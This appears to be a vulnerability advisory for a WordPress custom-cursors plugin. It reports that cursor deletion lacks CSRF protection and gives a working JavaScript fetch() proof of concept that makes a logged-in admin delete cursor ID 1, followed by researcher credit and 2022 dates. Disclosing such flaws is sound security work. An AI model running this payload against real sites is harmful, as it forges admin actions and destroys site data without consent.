The plugin does not have CSRF check in place when deleting cursors, which could allow attackers to made a logged in admin delete arbitrary cursors via a CSRF attack.
Make a logged in admin open a page with the following JS code: fetch('https://example.com/wp-admin/admin.php?page=wp_custom_cursors', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'submit&delete_row=1' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); This will make them delete the cursor with ID 1
Lana Codes
Lana Codes
Yes
2022-09-21 (about 8 months ago)
2022-09-21 (about 8 months ago)
2022-10-04 (about 7 months ago)